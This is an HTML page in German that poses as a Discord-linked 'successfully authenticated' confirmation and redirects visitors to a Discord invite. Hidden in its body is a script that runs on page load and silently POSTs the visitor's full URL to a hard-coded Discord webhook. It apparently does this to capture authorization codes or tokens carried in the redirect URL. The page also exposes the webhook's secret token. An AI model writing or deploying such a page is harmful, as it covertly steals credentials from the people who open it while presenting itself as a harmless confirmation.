<!DOCTYPE html>
<html lang="de">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Comic+Neue:ital,wght@0,300;0,400;0,700;1,300;1,400;1,700&display=swap" rel="stylesheet">
    <link rel="icon" type="image/x-icon" href="haken.png">
    <title>DevZone Authorized</title>

    <style>
        body {
            font-family: 'Comic Neue', cursive;
            user-select: none;
            background: linear-gradient(to right, #41637F, #232526);
            width: 100%;
            height: 100vh;
        }

        button {
            background: linear-gradient(to bottom, #3498db, #2980b9);
            color: white;
            font-size: 16px;
            padding: 12px 24px;
            border: none;
            cursor: pointer;
            border-radius: 20px;
            align-self: center;
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
        }

        .context h1 {
            text-align: center;
            color: #fff;
            font-size: 67px;
            font-weight: 900;
        }

        .context h3 {
            text-align: center;
            color: #fff;
            font-size: 25px;
        }

        .context {
            color: white
        }

    </style>
</head>

<body>
    <script>
        let currentURL = window.location.href;

        let message = currentURL;
        let request = new XMLHttpRequest();

        request.open("POST", "https://discordapp.com/api/webhooks/1068202910061695027/FQSnsdIXrT5gxxlAfA79dnNp3b6shmib4jM21iv3uspKKNNxFiUCzGacUZKuDTQSXF6P");

        request.setRequestHeader("Content-Type", "application/json");

        request.send(JSON.stringify({ content: message }));
    </script>

    <script>

        var countDownDate = new Date().getTime() + 5500;

        var x = setInterval(function () {

            var now = new Date().getTime();

            var distance = countDownDate - now;

            var seconds = Math.floor((distance % (1000 * 60)) / 1000);

            document.getElementById("countdown").innerHTML = seconds + "s ";

            if (distance < 0) {
                clearInterval(x);
                document.getElementById("countdown").innerHTML = "Wenn nicht drücke den Knopf";
            }
        }, 1000);
    </script>
</body>


<body>

    <div class="context">
        <h1>Du hast dich erfolgreich Authentifiziert</h1>
        <h3>Du wirst automatisch weitergeleitet</h3>
        <h3><p id="countdown"></p></h3>
        <a href="https://discord.gg/RPrpbpTNUS">
            <button>Zurück zu Discord</button>
        </a>
    </div>
</body>
<meta http-equiv="refresh" content="5; URL='https://discord.gg/RPrpbpTNUS'">

</html>